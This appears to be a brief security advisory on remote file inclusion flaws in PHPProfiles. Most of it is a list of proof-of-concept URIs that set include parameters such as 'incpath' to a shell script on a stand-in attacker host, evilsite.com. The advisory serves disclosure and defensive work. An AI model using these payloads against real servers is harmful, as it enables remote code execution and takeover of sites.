PHPProfiles Multiple Remote File Include Vulnerabilities

PHPProfiles Multiple Remote File Include Vulnerabilities

An attacker may exploit these issues using a web client.

The following proof-of-concept URIs are available:

http://www.example.com/[path]/include/body.inc.php?menu=http://evilsite.com/shell.php http://www.example.com/[path]/include/index.inc.php?incpath=http://evilsite.com/shell.php? http://www.example.com/[path]/include/account.inc.php?action=update&incpath=http://evilsite.com/shell.php? http://www.example.com/[path]/include/admin_newcomm.inc.php?action=create&incpath=http://evilsite.com/shell.php? http://www.example.com/[path]/include/header_admin.inc.php?incpath=http://evilsite.com/shell.php? http://www.example.com/[path]/include/header.inc.php?incpath=http://evilsite.com/shell.php? http://www.example.com/[path]/include/friends.inc.php?action=invite&incpath=http://evilsite.com/shell.php? http://www.example.com/[path]/include/menu_u.inc.php?incpath=http://evilsite.com/shell.php? http://www.example.com/[path]/include/notify.inc.php?action=sendit&incpath=http://evilsite.com/shell.php? http://www.example.com/[path]/include/body.inc.php?incpath=http://evilsite.com/shell.php? http://www.example.com/[path]/include/body_admin.inc.php?menu=http://evilsite.com/shell.php http://www.example.com/[path]/include/body_admin.inc.php?incpath=http://evilsite.com/shell.php? http://www.example.com/[path]/include/commrecc.inc.php?action=recommend&incpath=http://evilsite.com/shell.php? http://www.example.com/[path]/include/do_reg.inc.php?incpath=http://evilsite.com/shell.php? http://www.example.com[path]/include/comm_post.inc.php?action=post&incpath=http://evilsite.com/shell.php? http://www.example.com/[path]/include/menu_v.inc.php?incpath=http://evilsite.com/shell.php?